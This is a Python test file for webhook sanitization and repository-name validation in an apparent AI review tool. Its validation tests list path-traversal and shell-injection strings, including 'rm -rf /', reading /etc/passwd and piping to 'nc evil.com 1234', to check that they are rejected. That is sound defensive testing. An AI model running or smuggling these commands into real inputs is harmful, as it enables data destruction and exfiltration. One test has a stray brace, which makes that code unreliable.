"""Tests for security utilities (webhook sanitizer, validation, etc.).""" import sys from pathlib import Path import pytest # Add tools directory to path sys.path.insert(0, str(Path(__file__).parent.parent / "tools" / "ai-review")) from utils.webhook_sanitizer import ( extract_minimal_context, sanitize_webhook_data, validate_repository_format, ) class TestWebhookSanitizer: """Test webhook data sanitization.""" def test_sanitize_removes_email(self): """Test that email fields are redacted.""" data = { "user": { "login": "testuser", "email": "secret@example.com", "private_email": "private@example.com", } } sanitized = sanitize_webhook_data(data) assert sanitized["user"]["login"] == "testuser" assert sanitized["user"]["email"] == "[REDACTED]" assert sanitized["user"]["private_email"] == "[REDACTED]" def test_sanitize_removes_tokens(self): """Test that tokens and secrets are redacted.""" data = { "token": "ghp_secrettoken123456", "access_token": "sk-openai-key", "api_key": "apikey123", "safe_field": "visible", } sanitized = sanitize_webhook_data(data) assert sanitized["token"] == "[REDACTED]" assert sanitized["access_token"] == "[REDACTED]" assert sanitized["api_key"] == "[REDACTED]" assert sanitized["safe_field"] == "visible" def test_sanitize_truncates_large_body(self): """Test that large text fields are truncated.""" large_body = "x" * 1000 data = {"body": large_body} sanitized = sanitize_webhook_data(data) assert len(sanitized["body"]) < len(large_body) assert "[TRUNCATED]" in sanitized["body"] def test_sanitize_handles_nested_data(self): data = {"issue": {"user": {"email": "secret@example.com"}}} } sanitized = sanitize_webhook_data(data) assert sanitized["issue"]["user"]["email"] == "[REDACTED]" def test_sanitize_handles_lists(self): """Test sanitization of lists containing dicts.""" data = { "users": [ {"login": "user1", "email": "user1@example.com"}, {"login": "user2", "email": "user2@example.com"}, ] } sanitized = sanitize_webhook_data(data) assert sanitized["users"][0]["login"] == "user1" assert sanitized["users"][0]["email"] == "[REDACTED]" assert sanitized["users"][1]["email"] == "[REDACTED]" def test_sanitize_prevents_infinite_recursion(self): """Test max depth limit prevents infinite loops.""" # Create deeply nested structure data = {"level": {}} current = data["level"] for i in range(20): current["next"] = {} current = current["next"] # Should not crash, should limit depth sanitized = sanitize_webhook_data(data, max_depth=5) # Should stop at some depth assert "level" in sanitized class TestMinimalContextExtraction: """Test extraction of minimal webhook context.""" def test_extract_issue_comment_minimal(self): """Test minimal extraction for issue_comment events.""" event_data = { "action": "created", "issue": { "number": 123, "title": "Test Issue " + "x" * 300, # Long title "state": "open", "body": "Long body...", "user": {"email": "secret@example.com"}, "labels": [ {"name": "bug", "color": "red", "id": 1}, {"name": "priority: high", "color": "orange", "id": 2}, ], }, "comment": { "id": 456, "body": "Comment body", "user": {"login": "commenter", "email": "commenter@example.com"}, }, } minimal = extract_minimal_context("issue_comment", event_data) # Should only include essential fields assert minimal["action"] == "created" assert minimal["issue"]["number"] == 123 assert len(minimal["issue"]["title"]) <= 200 # Truncated assert minimal["issue"]["state"] == "open" assert "body" not in minimal["issue"] # Body excluded assert "email" not in str(minimal) # No emails # Labels should only have names assert len(minimal["issue"]["labels"]) == 2 assert minimal["issue"]["labels"][0]["name"] == "bug" assert "color" not in minimal["issue"]["labels"][0] assert "id" not in minimal["issue"]["labels"][0] # Comment should be minimal assert minimal["comment"]["id"] == 456 assert minimal["comment"]["body"] == "Comment body" assert minimal["comment"]["user"]["login"] == "commenter" assert "email" not in minimal["comment"]["user"] def test_extract_pull_request_minimal(self): """Test minimal extraction for pull_request events.""" event_data = { "action": "opened", "pull_request": { "number": 42, "title": "Fix bug", "state": "open", "body": "Long PR description...", "head": {"ref": "fix-branch", "sha": "abc123"}, "base": {"ref": "main", "sha": "def456"}, "user": {"login": "developer", "email": "dev@example.com"}, }, } minimal = extract_minimal_context("pull_request", event_data) assert minimal["pull_request"]["number"] == 42 assert minimal["pull_request"]["title"] == "Fix bug" assert minimal["pull_request"]["head"]["ref"] == "fix-branch" assert minimal["pull_request"]["base"]["ref"] == "main" assert "body" not in minimal["pull_request"] assert "email" not in str(minimal) def test_extract_truncates_long_comment(self): """Test that long comments are truncated.""" long_comment = "x" * 5000 event_data = { "action": "created", "issue": {"number": 1}, "comment": {"id": 1, "body": long_comment}, } minimal = extract_minimal_context("issue_comment", event_data) # Should be truncated to 2000 chars assert len(minimal["comment"]["body"]) == 2000 class TestRepositoryValidation: """Test repository format validation.""" def test_valid_repository_format(self): """Test valid repository formats.""" valid_repos = [ "owner/repo", "my-org/my-repo", "user_name/repo_name", "org123/repo456", ] for repo in valid_repos: owner, repo_name = validate_repository_format(repo) assert owner assert repo_name def test_invalid_repository_format(self): """Test invalid repository formats are rejected.""" invalid_repos = [ "no-slash", "too/many/slashes", "/leading-slash", "trailing-slash/", "", "owner/", "/repo", ] for repo in invalid_repos: with pytest.raises(ValueError): validate_repository_format(repo) def test_path_traversal_rejected(self): """Test that path traversal attempts are rejected.""" malicious_repos = [ "owner/../etc/passwd", "../../../etc/passwd", "owner/../../etc/passwd", ] for repo in malicious_repos: with pytest.raises(ValueError, match="Path traversal"): validate_repository_format(repo) def test_shell_injection_rejected(self): """Test that shell injection attempts are rejected.""" malicious_repos = [ "owner/repo; rm -rf /", "owner/repo && cat /etc/passwd", "owner/repo | nc evil.com 1234", "owner/repo`whoami`", "owner/repo$(whoami)", "owner/repo{test}", ] for repo in malicious_repos: with pytest.raises(ValueError, match="Invalid character"): validate_repository_format(repo) def test_empty_parts_rejected(self): """Test that empty owner or repo are rejected.""" with pytest.raises(ValueError, match="cannot be empty"): validate_repository_format("owner/") with pytest.raises(ValueError, match="cannot be empty"): validate_repository_format("/repo") def test_valid_repository_returns_parts(self): """Test that valid repository returns correct parts.""" owner, repo = validate_repository_format("test-owner/test-repo") assert owner == "test-owner" assert repo == "test-repo" class TestSanitizationEdgeCases: """Test edge cases in sanitization.""" def test_empty_dict(self): """Test sanitizing empty dict.""" result = sanitize_webhook_data({}) assert result == {} def test_non_dict_input(self): """Test handling of non-dict inputs.""" assert sanitize_webhook_data("string") == "string" assert sanitize_webhook_data(123) == 123 assert sanitize_webhook_data(None) is None def test_mixed_types_in_list(self): """Test sanitization of lists with mixed types.""" data = { "items": [ "string", 123, {"email": "test@example.com"}, None, ] } sanitized = sanitize_webhook_data(data) assert sanitized["items"][0] == "string" assert sanitized["items"][1] == 123 assert sanitized["items"][2]["email"] == "[REDACTED]" assert sanitized["items"][3] is None def test_case_insensitive_field_matching(self): """Test that sensitive field matching is case-insensitive.""" data = { "Email": "test@example.com", "TOKEN": "secret123", "Api_Key": "key123", } sanitized = sanitize_webhook_data(data) # Should match regardless of case assert sanitized["Email"] == "[REDACTED]" assert sanitized["TOKEN"] == "[REDACTED]" assert sanitized["Api_Key"] == "[REDACTED]" if __name__ == "__main__": pytest.main([__file__, "-v"])